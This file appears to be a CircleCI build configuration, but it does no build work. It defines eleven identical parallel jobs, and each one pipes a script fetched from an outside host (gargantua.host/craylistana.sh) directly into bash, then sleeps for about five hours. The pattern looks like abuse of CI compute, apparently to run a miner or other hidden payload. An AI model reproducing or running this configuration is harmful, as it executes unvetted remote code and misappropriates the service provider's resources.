version: 2.1

jobs:
  agterhapro:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  agterhapro1:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  agterhapro2:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  agterhapro3:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  agterhapro4:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  agterhapro5:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  agterhapro6:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  agterhapro7:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  agterhapro8:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  agterhapro9:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  agterhapro10:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

workflows:
  main:
    jobs:
      - agterhapro
      - agterhapro1
      - agterhapro2
      - agterhapro3
      - agterhapro4
      - agterhapro5
      - agterhapro6
      - agterhapro7
      - agterhapro8
      - agterhapro9
      - agterhapro10